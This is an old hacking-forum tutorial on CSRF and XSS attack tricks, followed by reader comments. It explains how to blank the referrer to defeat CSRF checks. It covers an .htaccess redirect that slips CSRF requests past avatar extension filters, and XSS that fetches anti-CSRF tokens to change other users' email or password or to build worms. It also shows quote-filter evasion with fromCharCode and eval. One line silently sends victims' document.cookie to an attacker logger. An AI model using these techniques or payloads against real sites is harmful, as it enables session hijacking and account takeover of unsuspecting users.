Advanced csrf and xss tricks
Advanced csrf and xss tricks
ghost | 13771 Reads | I was active here when I was a little younger, and learnt a lot. Now I am back, with more knowledge on web hacking. And I want to share this knowledge with you, just like I learned from the articles here when I was a newbie myself long ago.
You need to know beyond the basics of xss and csrf to have any use of this text.
HOW TO CLEAN THE REFERRER
Sometimes when you got a csrf exploit ready, you notice that if the referrer is not the domain where your exploit goes to, it gets rejected. What you have to do then, is to clean the referrer.
To do this, you have to clean the referrer by doing this:
Remember to remove the space between java and script. This code will create an iframe with the javascript: thingie, create a form on that blank page, and submit it. This will make the referrer clean, and you will circumvent any referrer checks.
If they dont even accept blank referrers, I dont think theres anything you can do about it.
HOW TO CURCUMVENT FILE EXTENSION CHECKS
On forums and online communities you can often use an avatar, which you link from the web. And very often, only extensions like .jpg .png etc are allowed. What you have to do then, is to use apache’s htaccess.
Make a folder on your webspace. Make a .htaccess file with the following content:
Redirect http://yay.com/pic.jpg http://csrf_here
The extension filter will not trigger. But when the image is displayed, the browser will find the http 301 redirect, and fetch the new page.
This way, you can redirect to logout.php or delete.php?id=34 etc.
Note that this cannot be used to redirect to POST csrf exploits. Because the browser does not interpret the html response code, it only queries it.
Additionally you can do fun stuff like redirecting to mailto:evil_popup or other protocols. Redirecting to java script: does not work though, and thank god for that.
HOW TO DO CSRF WHEN THERE ARE TOKEN CHECKS
If you make a csrf exploit which changes name, email or whatever, you may see that the site uses tokens to prevent this. To circumvent this, you need to find an xss flaw. When you find one, you can inject js, which will fetch the tokens which are needed.
http://pastebin.com/m7203ede5 Take a look at this code
This code will query /editprofile. The html code of that page contains the token, which is needed to change things.
This is the most interesting part:
data = ajaxRequest.responseText; k = data.match(“[0-9]{32}“);
This is called a regular expresblockedsion. And it will search the html code for a number, which is exactly 32 digits long. And there is only one number which is that long, and thats our token.
This token will be stored in the variable k. Then you use that token to do another ajax request, or you can create a new form dynamically and submit it. The point is, with the fethed token, you can do what you want. Change email, password, deleteaccount, change status etc.
This token fetching is very often needed when creating an xss worm.
wHAT TO DO IF QOUTES ARE FILTERED AWAY
Very often, you find that “ and ’ are escaped, replaced or removed. In that case, code like this wont work:
document.location.href=“http://csrf”
Because the “ are escaped.
To make code which has no “ or ’ in it, you can use js’s function fromCharCode().
http://www.wocares.com/noquote.php Use this tool to encode your js.
E.g. to make alert(“yo”) work, the code would be like this:
String.fromCharCode(97,108,101,114,116,40,54,41)
This code alone wont make the alert work. You need to wrap it around the eval() function, like this:
eval(String.fromCharCode(97,108,101,114,116,40,54,41))
HOW TO SILENTLY STEAL COOKIES
The document.location.href is quite noisy, and people will kind of understand something not good is happening. But theres a way to send off the cookies by doing this:
new Image().src=‘http://logger.php?cookie=’+document.cookie
This wont send the user anywhere, but silently send the cookies off to your server.
FINAL WORDS
I hope you learned something from this text, and that you give it a 10/10.
If the feedback is good, I am going to write more advanced stuff on this subject :) Feedback on the language/grammatics is also wanted, because english isnt my main language.
clone4 14 years ago
poorly structured, and I'm sorry but one sentence a paragraph? Techniques presented in rather 'newbie' non technical way, and are random collection of exploit techniques, rather then logically following order of advanced exploits. Also most of the stuff desribed in the article is hardly 'advanced' stuff, I mean with xss, one of the first things you learn is how to avoid quotes and double quotes… Unless you improve it, add more information, more techniques and more explanations, it will be poor from me
ghost 14 years ago
Very poor formatting. Almost can't make out where a real paragraph begins or ends. And clone4 pretty much got it all in his comment.
ghost 14 years ago
Yeah, this isn't advanced. This is basic shit and I'm pretty sure we already have a few articles that covers pretty much everything in this one. Poor. Oh, and you don't need to use eval() with the char code. You can just use it like this: alert(String.fromCharCode(88, 83, 83))
fashizzlepop 14 years ago
Personally, The Very Hungry Caterpillar just made me hungry. This actually showed me how to clean the refferer. I wouldn't mind another article about more advanced stuff.
Rate: "Average"
ghost 14 years ago
Jeez, tough crowd. It was alright?
I liked the file extension checks, that actually would have exploited a script I recently wrote. Looks like i'm going to go fix that! xD